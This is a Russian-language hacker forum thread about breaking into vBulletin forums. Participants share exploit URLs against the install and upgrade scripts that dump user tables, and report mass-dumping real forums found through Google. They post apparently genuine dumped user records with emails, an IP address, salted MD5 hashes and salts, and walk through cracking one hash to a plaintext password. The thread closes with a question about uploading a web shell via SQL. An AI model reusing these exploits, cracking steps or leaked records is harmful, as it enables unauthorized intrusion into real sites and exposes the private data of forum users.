Прошарил гугл вдоль и поперек
и не нашол ни какой уязвимости vBulletin Version 3.5.4
неужели это почти идеальный форум? :confused:

Просьба отписать про найденые уязвимости в этой теме :)

версия новая, публичных багов нет.

Кто это сказал КСС есть.

Кто это сказал КСС есть.

ну разве только Xss

если пока кроме xss нечиго не нашли это не означает что ничего нет

А нужно поискать потому что уже много где используют :p

а можно как то зделать такоеже

_http://forum.orgius.ru/profile.php?mode=viewprofile&u=37

на vBulletin Version 3.5.4 :D

VBulletin 3.5.4 Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=

Видео:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html

Не могу понять как в VBulletin 3.5.4 хеши пробрутить.
В VBulletin 3.5.4 соль есть?

Не могу понять как в VBulletin 3.5.4 хеши пробрутить.
В VBulletin 3.5.4 соль есть?
есть

ЗЫ ждем 3,6,0 вот там баги искать и будем

2 max_pain89
Скажи плз в краций где что взять что бы хешь про брутить.

VBulletin 3.5.4 Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=

Видео:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html
Вижу только проснулся. баг давно был уже. Но в паблике не видел не где.

про этот баг знли наверно уже давно потому что почти ни где не работает. :(
Может ище что-то есть? ;)
Подкидывайте не стисняйтесь, посмотрим, оценим. :d

Зделал всё как тут Видео:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html
а вот как брутит непонал в какой форме прочетал про соль и хеш но недаганаю

Проверил 30 мин по гуглу, из 10 форумов, 8 форумов думп сделал.

блин а я два часа просидел за ним и у меня всё время вотета песня вылетала!!!
-http://img66.imageshack.us/img66/4172/vb5ul.gif просит номер ползевателя или чтота такое!!как от етого избавится???

Бага уже не актуально. Можно забыть про неё она старая.

а ну тогда понятна!!

даите плиз ссылочку на видео, на рапиде уже удалено =(
в ллокале юзаю 3,5,4 нехоца чтобы попортили =))

скиньте на мыло видео плиз

karayl@mail.ru

Ребата как брутит хеш в пасвордпро мд5 сол пасс мд5 иле в Sql иле мд5
илижы какоита другой подзкажыте

Тебе нужен сам принцип работы брутера хешей?

не мне нада знать как их брутить хешы каторае я вытасчил

Всмысле? Тебе его разшифровать нужно или что ??

не рашыфровывыть мне ненада ничиво проста абеснити как вы делаите рашыффровку
хешей из vBulletin 3.0,1

Последний вариант в пасвор про.

Ну для этого есть программа каторая разшифровывает мд5 хэши можно взять её на нсд.ру но тебе нужны будут наверно словарики лучше тут оставь разшифруем

А где можна словарики взать а то я был на пару саитав 250 мв есть
e192610a0a6ff7c25a7f72d16b8d7eb4
2679ad8de076ef788411668df644e760
4fad102e4a316c11b8b1cf0a3dee71c5
4021fff15e077374f2064bc9bc34e93f
6641df675efd4492e269509ce2731343
be08d81af9f37f44e508565af7a220c0


>> лучше тут оставь разшифруем

Для этого есть подраздел, а здесь не надо.

если я неошибаюсь то в булке хэши солёные (ес енеправ - поправьте), качай с инсайдпро последнюю версию проги, в гугл посылать тебя неохота, но придёца - за словариками.. а дальше барабан в руки и т.д.

Э-э-э а видео уже нет на рапиде, вышли на мыло пожалуйста goodbdb@list.ru

НАРОД. Бага с виктимсайт НЕ РАБОТАЕТ ТЕПЕРЬ на форумах 3.5.4.
И чё там в видео смотреть? Надо быть лолегом чтобы НЕ СМОЧЬ заюзать этот баг...
Тонкий намёк... пробуйте форумы 3.0.1 . Гыгыгыгыгыг.
Думаете что такой галимый баг не работает на сурьёзных форумаъх? Ничего подобного. Я очень много баз сдампил... две из них - с больших муз. порталов по 6 с лишним тыс. юзверей. И, внимание, одна на 30 тыс юзверей.


Гуглите и вам воздастся. (с) NaZg
Запрос - Powered by

У меня есть база но где там соль незнаю подскажите.

Всем привет помнится ктото писал в теме что типа ждем версии 3.6.0 Beta 2 :D

Ну так вот хочу обрадывать такая версия уже сущиствует и много форумов уже проапдейтились.
прозьба вот какая нужно солёные хешики декодирывать подскажыте как плизз. :confused:

Ну и если ктото знает дырочки в новой версии то не стисняемся пишем. :rolleyes:

P.S. заранее благодарен за помощь.

Loading кинь строчку из базы полностью....

Elenberg кидай свой хеш и соль....

e7118f5d30a18f228b5992fac65d388c
f3515e5777438876e07a5b83eddb5d16
a самой соли у мну нет :(

Elenberg без соли не как... кинь строчку из базы полностью и тебе покажу где соль....

INSERT INTO user VALUES(\'2\',\'6\',\'10\',\'0\',\'alec\',\'f3515e5 777438876e07a5b83eddb5d16\',\'2006-07-28\',\'alec@mv.ru\',\'0\',\'\',\'\',\'\',\'\',\'\' ,\'0\',\'Просто удав\',\'1\',\'1107345600\',\'0\',\'1154443769 \',\'1154446334\',\'1153872240\',\'392\',\'13\',\' 5\',\'3\',\'0\',\'0\',\'0\',\'2774\',\'\',\'0000-00-00\',\'40\',\'2\',\'213.242.62.45\',\'0\',\'0\',\' \',\'0\',\'0\',\'-1\',\'20\',\'0\',\'^iq\',\'0\',\'0\',\'\',\'\',\'0 \',\'315765\',\'0\',\'0\',\'0\',\'0\',\'\');

ЗАРАНИЕ СПАСИБО

\"6\"|\"2\"|\"\"|\"0\"|\"TESTer\"|\"71bed998afe731fc280a130711e21fdd\"|\"2006-07-05\"|\"lox@lox.ru\"|\"0\"|\"\"|\"\"|\"\"|\"\"|\"\"|\"\"|\"\"|\"1\"|\"0\"|\"<font color=\\\"red\\\"><b><i>Главный Тестер</i></b></font>\"|\"1\"|\"1152098100\"|\"-1\"|\"1152737583\"|\"1152737583\"|\"1152105471\"|\"0\"|\"20\"|\"5\"|\"0\"|\"0\"|\"0\"|\"0\"|\"0\"|\"3159\"|\"\"|\"0000-00-00\"|\"-1\"|\"-1\"|\"\"|\"0\"|\"0\"|\"0\"|\"2\"|\"-1\"|\"0\"|\"0\"|\"U0j\"|\"0\"|\"0\"|\"0\"

Вот строчка из базы.

=> Loading

==========
hash - 71bed998afe731fc280a130711e21fdd
salt - U0j
==========

Ребяты я лама у меня почему то грузитья фаил upgrade_300b3.php
после нажатия на кнопку дамп базы.
обьясните чё я не так делаю??(((
заранее благодарен

for KruGoZor

всё так. и от скрипта не зависит.
как сплойт проще заюзать
/install/upgradecore.php?do=sqltable&table=user&step[]
где user - предполагаемое имя таблицы с хэшами юзверей

круто спасибо!!!
с меня +))

INSERT INTO user VALUES('1','6','','0','LORD ALUCARD','a7e65433b82e964d3c0c0719115b63f8','2006-07-23','','0','','','','','','','','2','1','Древ� �ее Зло','1','1153657920','0','1163931713','1163949 280','1163931841','40','10','5','3','0','0','0','0 ','2135','07-14-1988','1988-07-14','-1','1','','0','0','0','0','-1','21','0','sab');


плииз поможите ещё сгенерить пароль...или скажите как по шагам)))
где соль я тоже не могу найти (sab чтоли??)

хэш: a7e65433b82e964d3c0c0719115b63f8
соль: sab
метод шифрования: md5(md5($pass).$salt) [PHP]

пароль: 253839
=)))

юзал PasswordPro 2.2.1.2

Что то никто ничего толком не предложил... Exploit наверно нет... XSS я думаю все нашли... но это гимморойно....

Хэш брутить мона прогой PasswordPro, но если пароль не дико простой, то на это у тебя уйдёт пару десятков лет :)

А кто нибудь знает как заливать шел,через Sql запрос?

А кто нибудь знает как заливать шел,через Sql запрос?

чуть конкретней....